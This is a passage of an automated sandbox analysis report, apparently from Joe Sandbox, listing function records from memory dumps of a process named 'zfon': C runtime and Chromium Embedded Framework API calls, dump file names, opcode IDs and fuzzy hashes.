                                                                                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,00007FF8B90E6675), ref: 00007FF8B90E6C27
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memchrtolower$_errnoisspace
                                                                                                • String ID: 0$0$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                • API String ID: 3508154992-2432849056
                                                                                                • Opcode ID: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                • Instruction ID: 62c9bcdb583aed56ce2d98c53d4463063ce07b276a771294e22296c59ab78719
                                                                                                • Opcode Fuzzy Hash: 43815465dc66ac9b27d3f1ae7d633b0096f14b933a58eda5914f7ac150fdf0fb
                                                                                                • Instruction Fuzzy Hash: BC51D226E0DEC245EF259F2DF5643B96AA2AB447E4F5C4530CBBD066A4DE3CE4839300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                • API String ID: 2943138195-1464470183
                                                                                                • Opcode ID: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                • Instruction ID: 470cc432aa34f29a1346c63569779e56d280d00bd9858ab990d401e7941b60ca
                                                                                                • Opcode Fuzzy Hash: 056f7ce24c9a02fb08967ba7ebef161081805b5f1a36d64d6cbfd7b45a579add
                                                                                                • Instruction Fuzzy Hash: AD513676E18A569AFB10CBA8E8A05BCB7B5BB043C4F504136DB0D67A98EF2CE545C740
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105A60
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105AE7
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105B26
                                                                                                • _Maklocstr.LIBCPMT ref: 00007FF8B9105B40
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B9105C3A
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105C41
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Maklocstr$Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: ,$false$true
                                                                                                • API String ID: 2135902765-760133229
                                                                                                • Opcode ID: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                • Instruction ID: 973a16b7867fbe4fa10d2e0acd8fbf67930c7910f2f734a147de3c3da89f4f87
                                                                                                • Opcode Fuzzy Hash: 67ee8f4e636e21bca307c7727e2474fd631be0ead37d0a99a3418088d2fddda1
                                                                                                • Instruction Fuzzy Hash: EE519222618BC192E761CF29F4402AAB774FB887A4F545222EBDE03765EF3CD185C700
                                                                                                APIs
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90F55E3
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F563B
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F567A
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90F56B4
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F5712
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F5718
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B90F571D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskcalloc$ExceptionThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: false$true
                                                                                                • API String ID: 2349454547-2658103896
                                                                                                • Opcode ID: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                • Instruction ID: 421aa8544769f4fe547d103fa9146a6babc81386dfae7baf497d31c5a3ace082
                                                                                                • Opcode Fuzzy Hash: 5c88745e38c7f4b10ae99f2d41da75766dca5b299c890f36dbbf9fece8871ee5
                                                                                                • Instruction Fuzzy Hash: 4D41DE26B09BC181EF058F28A50437D67A1AB18FE8F144631CF6D037A4DE3CE5468340
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                • Instruction ID: 3fc6f86ce3c153bbf7b13a8e427834f209abd5b011d99dec537dbda8d488dc40
                                                                                                • Opcode Fuzzy Hash: 94660911d3f68742db9f2a705ee6932dc1207f5db5326e64da0827b37cbf373f
                                                                                                • Instruction Fuzzy Hash: 9871C072B04A4585EF14EFA5D8443ACA3B2EB45BE8F858535CE2D1B7DCEE28D445C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                • Instruction ID: acd9a3a5a28eb7670de7044133d8a8b0cbe5346b07318aae4595f9da5c45c208
                                                                                                • Opcode Fuzzy Hash: a0db33fac5e6835a1dc61bc8a7e5a05f80c65bcac56fb400c604ab9ae7a959c3
                                                                                                • Instruction Fuzzy Hash: 37719F62F04B4985FF14EFA5D8443ACA3B6AB44BD8F448535DE2E13BD9EE38D44583A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freemallocmemcpymemmove
                                                                                                • String ID:
                                                                                                • API String ID: 3118627126-0
                                                                                                • Opcode ID: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                • Instruction ID: e3d5292c5efa772745df06b0cb06dede2f56491f86b8ba64bdfb70f86426fe43
                                                                                                • Opcode Fuzzy Hash: a5eecf85066caf2ca4082cf663a4b9832b071540062ec553897185a369b81ea1
                                                                                                • Instruction Fuzzy Hash: 6571C122B0565184FB14BF6298047BCA772AB08BE4F980635DE3E177DCDE3A94828365
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                • Instruction ID: 7e9643776ecc64573fba65dcf0231b519422aa21ffb03f4e63b64b08050abdbe
                                                                                                • Opcode Fuzzy Hash: 48611227ffe65498255d77a92fe453c963127f7771fe6b3153835a7e479890d6
                                                                                                • Instruction Fuzzy Hash: 2551C366B04A4549FB14EF65E8143ACA3B2AB48BE8F844535DE3D17BDCEE3CD4468360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                • Instruction ID: 1bac6bb0258731db910c6f641a30561e167b203f18c0eb0dca87102ffadfd250
                                                                                                • Opcode Fuzzy Hash: 473cb218bd9dcfae363dac5d456b711c7f5da966875aa11239a6934cc367b413
                                                                                                • Instruction Fuzzy Hash: C451B122B04B5594FB14EFA5DC547ACA772BB44BE8F844535CE3D1BBDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                • Instruction ID: caa73eab7dd5ccf4a4483915f96dfc31433fa5bf1546f69ca299592221929198
                                                                                                • Opcode Fuzzy Hash: a0b0a483a40065930cb5af480a41cea5525e6b7e5afa53a07aa8fb18f7aacd68
                                                                                                • Instruction Fuzzy Hash: C251C122B05A5584FF14EFA5DC443AC6372BB44BA8F884635DE3D17BDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 2024851785-0
                                                                                                • Opcode ID: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                • Instruction ID: 6628fb9607c248f540299b823e21571818948bfa3bad17bc8e4e0cea8bdca906
                                                                                                • Opcode Fuzzy Hash: a5d4da3a4cc675d36da3e907575d5a8726f3eac4e27f902efdbd2ea72aec7a8d
                                                                                                • Instruction Fuzzy Hash: A651CF26B04B5584FB14EFA5DC543ACA3B2BB48BE8F944635CE3D17BDCEE2894418360
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointermemmove
                                                                                                • String ID:
                                                                                                • API String ID: 338301193-0
                                                                                                • Opcode ID: f4bbd506810e8ff949f1732fb6d8e1104fd3c67bd08d81a126e8d7f4640ce5bc
                                                                                                • Instruction ID: c943a23cbe33f84703e6316359f9db1309af545f0a574be1968c24bee9d77256
                                                                                                • Opcode Fuzzy Hash: f4bbd506810e8ff949f1732fb6d8e1104fd3c67bd08d81a126e8d7f4640ce5bc
                                                                                                • Instruction Fuzzy Hash: 835182A9A0AA4283FABDDBDDD44657C6BA8EF44BCCF09A435DB4D06AC5DE2CD4418310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$memset
                                                                                                • String ID:
                                                                                                • API String ID: 3154343008-0
                                                                                                • Opcode ID: 6ec1ee5972c53574257693c79e1a76e05e1dd9cfbc43a925a4a071997873a1f2
                                                                                                • Instruction ID: 54b861b8465c350ed9fd57d198d9943673785a3a34c07824decb42ecf5269356
                                                                                                • Opcode Fuzzy Hash: 6ec1ee5972c53574257693c79e1a76e05e1dd9cfbc43a925a4a071997873a1f2
                                                                                                • Instruction Fuzzy Hash: A7515222608B8185EB50EF65E8402AEA7B1FF88794F944132EB9C536EDDF3CD545C7A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: b158af5b53e103a09b4aab3a9a72efacb738642fba927685012b0b402389091f
                                                                                                • Instruction ID: 4aface367b1dcecef05ec937043ffa97b8a7c9468732a3f00ed2d4c27eb24bc0
                                                                                                • Opcode Fuzzy Hash: b158af5b53e103a09b4aab3a9a72efacb738642fba927685012b0b402389091f
